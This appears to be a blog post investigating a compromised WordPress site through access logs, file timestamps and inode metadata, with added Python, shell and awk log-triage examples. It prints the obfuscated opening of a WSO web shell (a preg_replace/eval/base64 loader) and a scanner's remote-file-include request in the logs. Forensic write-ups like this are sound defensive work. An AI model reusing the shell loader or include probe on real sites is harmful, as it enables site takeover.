80.255.227.87 - [24/Jul/2012:14:45:01 -0400] "POST /wp-xml.php HTTP/1.0" 302 747 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9a1) Gecko/20061204 GranParadiso/3.0a1"
80.255.227.87 - [24/Jul/2012:14:45:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 761 507 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Arcor 5.005; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
80.255.227.87 - [24/Jul/2012:14:45:09 -0400] "GET /wp-xml.php HTTP/1.1" 302 499 507 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
212.71.10.193 - [24/Jul/2012:14:47:26 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 507 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:51:27 -0400] "GET /wp-xml.php HTTP/1.1" 302 483 507 "http://hackedsite.com" "Opera/9.01 (X11; Linux i686; U; en)"
80.255.227.87 - [24/Jul/2012:14:57:24 -0400] "GET /wp_c182.php HTTP/1.1" 200 483 33715 "http://hackedsite.com" "Opera/9.50 (Windows NT 5.1; U; en)"
80.255.227.87 - [24/Jul/2012:14:57:25 -0400] "POST /wp_c182.php HTTP/1.0" 200 4010 34283 "http://hackedsite.com/wp_c182.php" "Opera/9.50 (Windows NT 5.1; U; en)"
80.255.227.87 - [24/Jul/2012:14:57:25 -0400] "POST /wp_c182.php HTTP/1.0" 200 661 34273 "http://hackedsite.com/wp_c182.php" "Opera/9.50 (Windows NT 5.1; U; en)"
80.255.227.87 - [24/Jul/2012:15:04:35 -0400] "GET /wp_c182.php HTTP/1.1" 200 538 34338 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:35 -0400] "POST /wp_c182.php HTTP/1.0" 200 719 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 1559 14260 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 754 12460 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:37 -0400] "POST /wp_c182.php HTTP/1.0" 200 826 14258 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:38 -0400] "POST /wp_c182.php HTTP/1.0" 200 1755 14268 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:38 -0400] "POST /wp_c182.php HTTP/1.0" 200 826 14258 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:06:35 -0400] "GET /wp_c182.php HTTP/1.1" 200 538 34338 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:35 -0400] "POST /wp_c182.php HTTP/1.0" 200 719 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 1556 10360 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 750 12443 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 823 10350 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 1752 10990 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:37 -0400] "POST /wp_c182.php HTTP/1.0" 200 823 10980 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:07:16 -0400] "POST /wp_c182.php HTTP/1.0" 200 754 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 1592 69402 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 787 12450 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 859 69400 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 1788 69410 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 859 69400 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:08:16 -0400] "POST /wp_c182.php HTTP/1.0" 200 787 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 1624 11619 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 819 12445 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 891 11617 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 1820 11627 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 891 11617 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:15:52 -0400] "GET /wp_c182.php HTTP/1.1" 200 537 34338 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:15:15:57 -0400] "POST /wp_c182.php HTTP/1.0" 200 4064 34283 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:15:15:57 -0400] "POST /wp_c182.php HTTP/1.0" 200 715 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:15:17:46 -0400] "POST /wp_c182.php HTTP/1.0" 200 4084 34283 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 (.NET CLR 3.5.30729)"
80.255.227.87 - [24/Jul/2012:15:17:46 -0400] "POST /wp_c182.php HTTP/1.0" 200 735 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 (.NET CLR 3.5.30729)"
212.71.10.193 - [24/Jul/2012:15:44:21 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:16:36:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:17:25:44 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:18:06:53 -0400] "GET /wp_c182.php HTTP/1.1" 403 523 400 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
212.71.10.193 - [24/Jul/2012:18:13:25 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:03:35 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:54:44 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:20:44:11 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:21:34:33 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:22:25:16 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

Hum… I’m not a huge Wordpress guy, but I don’t remember seeing a page called wp_c182.php before. Funny that I missed that one earlier when I looked at the directory listing.
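Three greps got there, but a script that knows what a stock install looks like would have flagged wp_c182.php (and wp-xml.php, and traninfo.html) on first sight. The following added example (my code, not from the post) parses the vhost log format shown above, treats any request for a top-level path that is not in the stock file list taken from the `ls -l` listing as non-stock, and summarises per client; most sample lines are copied from the log excerpts above, the 198.51.100.7 lines are constructed, and the meaning of the two numeric counters in this log format is not stated on the page, so they are only captured, not interpreted.

```python
import re
from collections import defaultdict

# Sample input: lines copied from the page's log excerpts, plus two constructed
# lines (198.51.100.7) standing in for an ordinary visitor.
SAMPLE_LOG = """\
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:01:37 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
80.255.227.87 - [24/Jul/2012:14:57:24 -0400] "GET /wp_c182.php HTTP/1.1" 200 483 33715 "http://hackedsite.com" "Opera/9.50 (Windows NT 5.1; U; en)"
80.255.227.87 - [24/Jul/2012:14:57:25 -0400] "POST /wp_c182.php HTTP/1.0" 200 4010 34283 "http://hackedsite.com/wp_c182.php" "Opera/9.50 (Windows NT 5.1; U; en)"
198.51.100.7 - [24/Jul/2012:15:30:02 -0400] "GET /wp-login.php HTTP/1.1" 200 3210 1200 "-" "Mozilla/5.0 (constructed ordinary visitor)"
198.51.100.7 - [24/Jul/2012:15:30:09 -0400] "GET /wp-content/themes/default/style.css HTTP/1.1" 200 3000 800 "http://hackedsite.com/" "Mozilla/5.0 (constructed ordinary visitor)"
"""

# Top-level files of the install, taken from the `ls -l` listing above. Anything else
# at the top level (traninfo.html, wp-xml.php, wp_c182.php) is not part of WordPress.
STOCK_FILES = {
    "/", "/index.php", "/default.html", "/readme.html", "/license.txt",
    "/400.shtml", "/401.shtml", "/403.shtml", "/404.shtml", "/500.shtml", "/500.php",
    "/wp-activate.php", "/wp-app.php", "/wp-atom.php", "/wp-blog-header.php",
    "/wp-comments-post.php", "/wp-commentsrss2.php", "/wp-config.php", "/wp-config-sample.php",
    "/wp-feed.php", "/wp-links-opml.php", "/wp-load.php", "/wp-login.php", "/wp-mail.php",
    "/wp-pass.php", "/wp-rdf.php", "/wp-register.php", "/wp-rss2.php", "/wp-rss.php",
    "/wp-settings.php", "/wp-signup.php", "/wp-trackback.php", "/xmlrpc.php",
}
# Requests below these prefixes are left alone here: files dropped inside them
# (the *_box.php and pic.php found later) need a file-system inventory, not a log filter.
STOCK_DIRS = ("/wp-admin/", "/wp-content/", "/wp-includes/", "/files/")

# The page's vhost format: client, "-", [timestamp], request, status, two counters, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes_a>\d+) (?P<bytes_b>\d+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_unknown_path(path):
    """True when the path is neither a stock top-level file nor under a stock directory."""
    path = path.split("?", 1)[0]
    return path not in STOCK_FILES and not path.startswith(STOCK_DIRS)

def first_request_to(log_text, path):
    """(timestamp, client) of the earliest request for `path`, as the first grep on the page does."""
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].split("?", 1)[0] == path:
            return rec["ts"], rec["ip"]
    return None

def triage(log_text):
    """Per client: first/last seen, request count, non-stock paths hit, POSTs to non-stock scripts."""
    report = defaultdict(lambda: {"first_seen": None, "last_seen": None, "requests": 0,
                                  "unknown_paths": set(), "posts_to_unknown": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        e = report[rec["ip"]]
        e["requests"] += 1
        e["first_seen"] = e["first_seen"] or rec["ts"]   # logs are in chronological order
        e["last_seen"] = rec["ts"]
        if is_unknown_path(rec["path"]):
            e["unknown_paths"].add(rec["path"].split("?", 1)[0])
            if rec["method"] == "POST":                   # POSTing to a foreign script: shell use
                e["posts_to_unknown"] += 1
    return {ip: e for ip, e in report.items() if e["unknown_paths"]}

if __name__ == "__main__":
    for ip, e in sorted(triage(SAMPLE_LOG).items(), key=lambda kv: -kv[1]["posts_to_unknown"]):
        print(f"{ip:15} {e['first_seen']} .. {e['last_seen']}  POSTs to non-stock: "
              f"{e['posts_to_unknown']}  paths: {sorted(e['unknown_paths'])}")
```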

$ cat wp_c182.php  
<?php
$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x6

After a short analysis, it turns out that script is actually WSO 2.5. Unfortunately, it appears that file was uploaded on July 16th, and I don’t have those access logs anymore. I’m still curious to know how they got in, so let’s see if anything else was uploaded more recently. I noticed earlier that the wp-content directory had been modified today. Maybe we can find something in there.

$ find . -type f -mtime -1 | xargs ls -il
23210930 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:08 ./cgi-bin/245_box.php
23209564 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:06 ./cgi-bin/24_box.php
23209637 -rw-r--r-- 1 2017 2017   244 2012-07-24 15:08 ./cgi-bin/.htaccess
23208397 -rw-r--r-- 1 2017 2017  2661 2012-07-24 15:17 ./.htaccess
23209655 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:07 ./wp-admin/791_box.php
23209555 -rw-r--r-- 1 2017 2017   244 2012-07-24 15:07 ./wp-admin/.htaccess
23209201 -rw-r--r-- 1 2017 2017 23316 2012-07-24 22:49 ./wp_c182.php
23209200 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:04 ./wp-content/447_box.php
23209250 -rw-r--r-- 1 2017 2017   244 2012-07-24 15:04 ./wp-content/.htaccess
23210949 -rw-r--r-- 1 2017 2017 11101 2012-07-24 10:13 ./wp-content/pic.php

It’s pretty safe to assume that those *_box.php files and pic.php are not supposed to be there. All of these files were last modified today but what I really want to know is when they were created. Using the -i flag in ls, I can use the returned inode index to get that info.

$ debugfs -R 'stat <23210930>' /dev/sda7
debugfs 1.41.11 (14-Mar-2010)

Inode: 23210930   Type: regular    Mode:  0644   Flags: 0x80000
Generation: 3479487985    Version: 0x00000000:00000001
User:  2017   Group:  2017   Size: 143
File ACL: 0    Directory ACL: 0
Links: 1   Blockcount: 8
Fragment:  Address: 0    Number: 0    Size: 0
 ctime: 0x500ef2a1:5348cf2c -- Tue Jul 24 15:08:17 2012
 atime: 0x500ef2a1:2861e600 -- Tue Jul 24 15:08:17 2012
 mtime: 0x500ef2a1:2861e600 -- Tue Jul 24 15:08:17 2012
crtime: 0x500ef2a1:2861e600 -- Tue Jul 24 15:08:17 2012
Size of extra inode fields: 28
EXTENTS:
(0): 92875357
(END) 
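The same stat, run over every file the find above returned instead of one inode at a time, as an added example that is not part of the original post. It assumes GNU find, debugfs from e2fsprogs, an ext4 filesystem with 256-byte inodes (crtime is only stored there) and root privileges; WEBROOT and DEVICE are placeholders for the site's docroot and partition.

```shell
#!/bin/sh
# Added example (not from the post): automate the find / ls -i / debugfs step
# so every recently modified file under a web root is listed with its crtime.
# Assumes GNU find, debugfs from e2fsprogs, an ext4 filesystem with 256-byte
# inodes (older 128-byte inodes carry no crtime) and root privileges.
# WEBROOT and DEVICE are placeholders for the site's docroot and partition.

# Read `debugfs -R 'stat <ino>'` output on stdin, print the human-readable crtime.
# The ctime/atime/mtime lines start with a space, so only the crtime line matches.
crtime_from_stat() {
    sed -n 's/^crtime: *[^ ]* -- //p'
}

# recent_with_crtime WEBROOT DAYS DEVICE
# For each regular file modified within DAYS, print "crtime | mtime | inode | path".
# A crtime later than the mtime deserves a second look: mtime can be backdated
# with touch, crtime cannot.
recent_with_crtime() {
    root=$1; days=$2; device=$3
    find "$root" -type f -mtime -"$days" -printf '%i %TY-%Tm-%Td %TH:%TM %p\n' |
    while read -r ino mdate mtime path; do
        created=$(debugfs -R "stat <$ino>" "$device" 2>/dev/null | crtime_from_stat)
        printf '%s | %s %s | %s | %s\n' \
            "${created:-crtime unavailable}" "$mdate" "$mtime" "$ino" "$path"
    done
}

# On the post's box this would be:
#   recent_with_crtime /var/www/WEBROOT 1 /dev/sda7
```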

So the file was created today. Awesome. Unfortunately, atime is pretty useless since the partition is mounted with noatime. At least, we know this wasn’t here a few hours ago. Let’s see who tried to use those pages.

$ grep -iP "\/(pic|\d\d\d?_box)\.php" /var/log/apache2/vhosts_access.log 
94.75.208.167 - [24/Jul/2012:10:49:39 -0400] "GET /pic.php HTTP/1.0" 404 421 9296 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:49:39 -0400] "GET /pic.php.php HTTP/1.0" 404 425 9296 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
85.17.188.139 - [24/Jul/2012:15:35:30 -0400] "GET /wp-content/447_box.php HTTP/1.0" 302 389 198 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
85.17.188.139 - [24/Jul/2012:15:50:24 -0400] "GET /cgi-bin/24_box.php HTTP/1.0" 302 379 198 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
85.17.188.139 - [24/Jul/2012:15:56:18 -0400] "GET /wp-admin/791_box.php HTTP/1.0" 302 385 198 "-" "Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
85.17.188.139 - [24/Jul/2012:16:07:29 -0400] "GET /cgi-bin/245_box.php HTTP/1.0" 302 397 198 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0"

Meh. Two new IPs. Turns out 94.75.208.167 is a robot designed to find vulnerabilities on a bunch of different sites. Here are a few examples of the requests it made this morning:

94.75.208.167 - [24/Jul/2012:10:48:23 -0400] "GET /infolab2.php HTTP/1.1" 404 361 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:23 -0400] "GET /info.php HTTP/1.1" 404 357 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:23 -0400] "GET /info.pl HTTP/1.1" 404 356 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /infos.php HTTP/1.1" 404 358 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /ini.php HTTP/1.1" 404 356 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /ini.php?file=http://www.eas*removed*l.com/x2.gif HTTP/1.1" 404 397 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /init.php HTTP/1.1" 404 357 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:25 -0400] "GET /in.php HTTP/1.1" 404 355 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

But here’s something very interesting:

94.75.208.167 - [24/Jul/2012:10:44:26 -0400] "GET /traninfo.html HTTP/1.1" 200 362 4188 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

This at least confirms that this IP is linked to the hack in question. Enough messing around. According to wp-includes/versions.php, this site was running Wordpress 3.0.5. That’s 17 months old. Not cool.
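To make the grep-and-eyeball log triage above repeatable, here is an added example that is not part of the original post: two awk helpers for the access-log layout this post shows. SAMPLE_LOG is constructed from that layout, not the site's real log, and the INDICATOR pattern is an assumption built from the file names found above.

```shell
#!/bin/sh
# Added example (not from the post): repeatable triage for the access-log layout
# shown in this post:
#   ip - [ts tz] "METHOD path proto" status bytes extra "referer" "user-agent"
# SAMPLE_LOG is constructed for illustration and is not the site's real log.
SAMPLE_LOG='50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0"
50.116.26.166 - [24/Jul/2012:09:01:37 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0"
94.75.208.167 - [24/Jul/2012:10:48:23 -0400] "GET /info.php HTTP/1.1" 404 357 9344 "-" "Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /ini.php HTTP/1.1" 404 356 9344 "-" "Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:49:39 -0400] "GET /pic.php HTTP/1.0" 404 421 9296 "-" "Safari/533.21.1"
85.17.188.139 - [24/Jul/2012:15:35:30 -0400] "GET /wp-content/447_box.php HTTP/1.0" 302 389 198 "-" "MSIE 9.0"
10.0.0.5 - [24/Jul/2012:16:00:00 -0400] "GET /index.php HTTP/1.1" 200 8000 1200 "-" "Mozilla/5.0"'

# Paths the post treated as indicators (assumption): the dropped shell, the
# *_box.php files, pic.php and the wp-xml.php endpoint that does not exist on disk.
# Written with [.] rather than \. so that awk -v does not mangle the escape.
INDICATOR='/(pic|[0-9][0-9][0-9]?_box|wp_c[0-9]+|wp-xml)[.]php$'

# first_hit PATTERN (log on stdin): print "timestamp ip" of the first request whose
# path matches PATTERN, the question the post's first grep answered. Field layout:
# $1 ip, $3 [timestamp, $6 path, $8 status. Apache writes lines in order, so the
# first match is the earliest.
first_hit() {
    awk -v pat="$1" '$6 ~ pat { sub(/^\[/, "", $3); print $3, $1; exit }'
}

# triage_ips (log on stdin): one line "ip hits indicator_hits not_found" for every
# IP that touched an indicator path, or whose requests were mostly 404s (the
# scanner behaviour 94.75.208.167 showed above).
triage_ips() {
    awk -v pat="$INDICATOR" '
        { hits[$1]++; if ($6 ~ pat) ind[$1]++; if ($8 == 404) nf[$1]++ }
        END {
            for (ip in hits)
                if (ind[ip] > 0 || nf[ip] > hits[ip] / 2)
                    print ip, hits[ip], ind[ip] + 0, nf[ip] + 0
        }' | sort
}

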